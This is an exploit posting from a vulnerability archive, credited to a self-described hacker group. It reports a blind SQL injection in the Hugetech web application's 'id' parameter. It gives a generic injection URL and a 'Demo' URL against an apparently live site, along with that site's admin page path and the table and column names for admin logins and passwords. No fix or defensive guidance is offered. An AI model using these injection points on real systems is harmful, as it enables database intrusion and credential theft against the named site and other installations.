Hugetech SQL Injection

2011.08.10
Credit: skote_vahshat
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=| |* ______ ____ __ __ | |* /\__ _\/\ _`\ /\ \/\ \ | |* \/_/\ \/\ \ \L\ \\ \ \_\ \ { Turki$ hackers } | |* \ \ \ \ \ _ <'\ \ _ \ | |* \ \ \ \ \ \L\ \\ \ \ \ \ | |* \ \_\ \ \____/ \ \_\ \_\ | |* \/_/ \/___/ \/_/\/_/ | |* | |* | |=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=| ======================================================================= \* [Title] :[ Hugetech sql injection vulnerability] /* \* [Author] :[skote_vahshat] /* \* [Home] :[Http://Skote-Vahshat.com] /* \* [Archive] :[Http://xpl.skote-vahshat.com] /* \* [Email] :[skote.vahshat@Gmail.Com] /* ======================================================================= /* Web Server: Microsoft-IIS/6.0 /* Powered-by: ASP.NET /*Powered-by: PHP/5.2.4 /* [+]Exploit : /* http://www.target.com/en/pread.php?id=[SQLi] /* [+]Demo: /* http://www.asaxssd.com/en/pread.php?id=21[SQLi] /* [+]admin page /* http://www.asaxssd.com/en/manager/ /* [+] talbe admin (login) /* [+] column ( loginname , loginpwd) /* blind Sql injection ======================================================================= |_***_| spical thanks : bl4ck.viper all turkiS hackers| =======================================================================


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top